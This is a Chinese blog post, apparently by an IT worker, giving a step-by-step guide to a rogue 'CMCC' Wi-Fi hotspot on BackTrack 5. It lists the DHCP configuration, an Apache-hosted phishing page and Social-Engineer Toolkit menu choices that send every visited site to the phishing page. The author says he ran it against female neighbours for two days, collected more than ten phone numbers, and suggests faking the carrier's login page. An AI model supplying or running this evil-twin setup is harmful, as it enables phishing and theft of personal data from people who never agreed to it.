那是一個漆黑的夜晚,北風凜凜,我和我的小伙伴們結伴走在回家的路上。下面……沒有了,哈哈……我是標題黨!
言歸正傳,我和我的小伙伴們住的地方離某知名藝術大學比較近,某天晚上下班回家,在開門的時候碰到幾位美女,發現她們住在我們對面,使我們這群IT基友們甚是激動。巴不得湊上去對美女說一句“我是修電腦的,你家電腦慢不慢,我免費幫你弄下?”。
YY歸YY,但我們這群搞IT的都是比較內斂的,怎么好意思主動搭訕,因為我們都是有身份證的人。回到屋里很不淡定,苦思冥想好幾分鐘;“我們不好意思問她們要,為什么不讓他們主動給我們呢?”
我們附近沒有CMCC信號,我們就想搭建一個免費的CMCC,讓她們主動來輸入手機號認證,豈不更好,下面是實施計劃。
準備:無線網卡(8137)、bt5、釣魚頁面
#ifconfig eth0 up
#ifconfig wlan0 up
#ifconfig eht0 192.168.10.2/24
#apt-get install dhcp3-server
# vi /etc/default/dhcp3-server
INTERFACES="eth0" 修改為 INTERFACES="at0"
# vi /etc/dhcp3/dhcpd.conf
把下面貼進去,或者改成自己想要分的網段。
default-lease-time 600;
max-lease-time 7200;
option subnet-mask 255.255.255.0;
option broadcast-address 192.168.10.255;
option routers 192.168.10.2;
option domain-name-servers 192.168.10.1;
option domain-name "www.metasploit.cn";
subnet 192.168.10.0 netmask 255.255.255.0 {
range 192.168.10.10 192.168.10.100;
}
如圖
# /etc/init.d/apache2 start
# cd /var/www/??? //進入網站目錄,bt5里apache默認首頁是index.html
#vi index.html??? //修改成自己的釣魚頁面,這里為了演示,我插入基礎釣魚
BT5里面我安裝的有XSS平臺,這里的Ip要注意,要和剛才我們在dhcp配置文件里面分配的ip段同網段,否則別人連接進來,訪問不了的;
當然如果你直接偽造成移動CMCC頁面也行!
# cd /pentest/exploits/set/
# ./set
這里選擇第一個set>1
1)? Social-Engineering Attacks
下一步
這里選擇第一個set>8
8) WirelessAccess Point Attack Vector
下一步
set:wireless>1 //選擇1 啟動
會提示讓你編輯dhcp3-server這個文件。按Ctrl+x 直接退出就可以,因為之前我們編輯過了。
下一步
選擇分配的Ip段
set:wireless>2
Enter the wireless network interface (ex. wlan0):wlan0 //選擇wlan0
(忘記說一個,# vi /pentest/exploits/set/config/set_config.py 更改為自己想要的AP名字,我這里改成CMCC)
下面是效果
連接AP不用輸入密碼
打開任意網站都會跳到我的釣魚頁面
手機UC登陸效果
總結:
釣了2天,釣到10多個“美女”手機號碼,效果還是不錯,如果偽造成cmcc登陸頁面,效果會更好! (僅限技術研究,切勿用于法非用途!!!后果自負)